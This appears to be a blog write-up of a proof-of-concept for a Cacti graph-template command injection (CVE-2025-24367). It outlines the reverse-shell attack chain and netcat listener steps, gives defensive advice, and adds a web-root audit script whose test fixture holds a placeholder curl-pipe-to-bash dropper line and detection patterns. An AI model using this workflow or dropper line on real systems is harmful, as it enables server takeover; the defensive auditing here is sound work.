Overview
I recently developed a proof-of-concept exploit for CVE-2025-24367, an authenticated remote code execution (RCE) vulnerability affecting Cacti.
This issue stems from insufficient input sanitization in graph template handling. Under certain conditions, user-controlled fields are passed into an RRDTool command context without proper filtering, allowing command injection.
While authentication is required, the vulnerability enables a valid user to escalate impact significantly by writing and executing arbitrary PHP code on the server.
This PoC was developed strictly for lab environments and authorized testing.
Vulnerability Summary
- Product: Cacti
- CVE: CVE-2025-24367
- Type: Authenticated Remote Code Execution
- Attack Vector: Graph template injection (RRDTool context)
- Authentication Required: Yes
The root cause lies in unsafe handling of user-supplied input within graph template fields. Because these fields influence RRDTool command execution, improper sanitization opens the door to command injection.
Exploit Concept
The exploit leverages the “Unix – Logged in Users” graph template (commonly template ID 226).
1️⃣ Payload Upload
A malicious modification of the graph template causes Cacti to:
- Write a PHP file into the web root
- That PHP file downloads a secondary bash reverse shell payload from the attacker
2️⃣ Payload Execution
The template is triggered again, causing:
- Execution of the dropped PHP file
- Retrieval and execution of the bash reverse shell
- A connection back to the attacker’s listener
A temporary HTTP server is used to host the payload during exploitation.
Technical Breakdown
At a high level, the vulnerability exists because:
- User-controlled graph template fields are inserted into RRDTool command strings.
- The application does not adequately sanitize or escape shell metacharacters.
- This allows command injection within the RRDTool execution context.
Because Cacti often runs with elevated permissions, the impact can be significant.
Lab Demonstration Workflow
- Start a listener:
  nc -lvnp 4444
- Run the exploit:
  python3 exploit.py
- Provide:
  - Base URL (without /cacti/)
  - Valid credentials
  - Attacker IP and port
If successful, a reverse shell connects back to the listener.
Security Impact
Although authentication is required, this vulnerability is high-risk because:
- Cacti is often internally exposed.
- Monitoring systems frequently have elevated system access.
- Authenticated user accounts may be low-privileged or shared.
- Lateral movement becomes trivial once code execution is achieved.
Defensive Recommendations
If you are running Cacti:
- Update immediately to a patched version once available.
- Restrict access to Cacti behind VPN or IP allow-listing.
- Monitor for unexpected changes to graph templates.
- Audit web root directories for suspicious PHP files.
- Restrict OS-level permissions for the web server user.
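As an added example (not code from the original post or from the Cacti project), here is a small Python audit that implements the "audit web root directories for suspicious PHP files" recommendation: it walks a web root, flags PHP files containing shell-execution calls or download-and-run one-liners, and notes whether the file was modified recently. The patterns and the constructed sample files are assumptions chosen for illustration; the host name in the sample is a placeholder.

```python
import os
import re
import tempfile
import time

# Heuristics for a dropped PHP loader: shell-execution functions, eval, and
# download-then-run one-liners. Constructed for this example, not a full ruleset.
SUSPICIOUS_PATTERNS = {
    "shell_exec_call": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
    "eval_call": re.compile(r"\beval\s*\("),
    "download_and_run": re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba)?sh\b"),
    "dev_tcp": re.compile(r"/dev/tcp/"),
}

def scan_php_file(path, max_age_seconds, now):
    """Return the reasons a PHP file looks suspicious (empty list if clean)."""
    reasons = []
    try:
        with open(path, "r", errors="replace") as fh:
            content = fh.read()
    except OSError:
        return ["unreadable"]
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(content):
            reasons.append(name)
    # A web root should only change on upgrade, so a fresh mtime is a supporting signal.
    if now - os.path.getmtime(path) < max_age_seconds:
        reasons.append("recently_modified")
    return reasons

def audit_web_root(root, max_age_days=7, now=None):
    """Walk a web root; return {relative_path: [reasons]} for PHP files matching a content pattern."""
    now = time.time() if now is None else now
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith((".php", ".phtml", ".phar")):
                continue
            full = os.path.join(dirpath, fn)
            reasons = scan_php_file(full, max_age_days * 86400, now)
            # mtime alone is too noisy to report; require at least one content match.
            if any(r != "recently_modified" for r in reasons):
                findings[os.path.relpath(full, root)] = reasons
    return findings

def demo():
    """Constructed web root: one benign include and one dropper-style loader (placeholder host)."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php include('include/auth_login.php'); ?>\n")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "x.php"), "w") as fh:
        fh.write("<?php shell_exec('curl http://ATTACKER_PLACEHOLDER/s.sh | bash'); ?>\n")
    return audit_web_root(root)
```

Run `audit_web_root("/path/to/cacti")` on a schedule and diff the result against a known-good baseline; a new entry under a directory that normally holds only images or templates is worth an immediate look.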
This PoC highlights how seemingly harmless configuration features — like graph templates — can become RCE primitives when sanitization is insufficient.
Authenticated vulnerabilities are often underestimated, but in real-world environments, they can be just as damaging as unauthenticated exploits.